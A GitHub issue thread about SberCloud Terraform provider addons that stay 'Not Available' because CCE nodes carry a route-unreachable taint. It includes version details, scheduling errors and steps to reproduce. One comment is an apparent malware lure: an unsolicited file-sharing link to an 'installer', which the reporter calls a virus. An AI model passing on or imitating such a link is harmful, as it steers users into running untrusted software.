### ISSUE TITLE
Error creating addons in CCE cluster or something wrong with terraform configuration

### ISSUE THREAD

**Issue by xT10r** [sbercloud-terraform/terraform-provider-sbercloud#313]
Hi, there,

I'm encountering an issue when adding addons to a CCE cluster while applying a Terraform configuration. 

### Terraform Version
```
Terraform v1.9.3
on linux_amd64
```

# Sbercloud Provider Version
```
Sbercloud Provider v.1.12.2
```

### Affected Resource(s)
- sbercloud_cce_cluster
- sbercloud_cce_node_pool
- sbercloud_cce_addon

### Terraform Configuration Files
[tf-config.zip](https://github.com/user-attachments/files/16870477/tf-config.zip)

### Debug Output
https://gist.github.com/xT10r/22909d1e1b5db02c4cce496ce8edb96a

### Expected Behavior
Addons should be created and become available with their pods in a normal state.

### Actual Behavior
When trying to add addons through Terraform or manually, the addons are added but remain in a "Not Available" state. Additionally, the pods associcated with these addons are in an "Abnormal" status.

If I check the cloud UI, I see the following details:
- On the "Pods" tab for the addon:
```
Pod scheduling failed.: 0/2 nodes are available: 2 node(s) had untolerated taint {node.kubernetes.io/route-unreachable: }. preemption: 0/2 nodes are available: 2 Preemption is not helpful for scheduling.
```

- In the "Nodes" tab of the cluster section, the "Node pool" is in the "Restricted schedulin" state with taint:
```
node.kubernetes.io/route-unreachable - NoSchedule
```

### Steps to Reproduce
1. * Add keypair to cloud
2. * Set keypair name to `cce_node_pool` resource
```
key_pair  = "cce_keypair"
```

4. `terraform init`
5. `terraform plan`
6. `terraform apply`

**Comment by blade2005** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by xT10r** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

Вирус

**Comment by xT10r** [comment]
I found my mistake. The SberCloud Provider is working correctly.
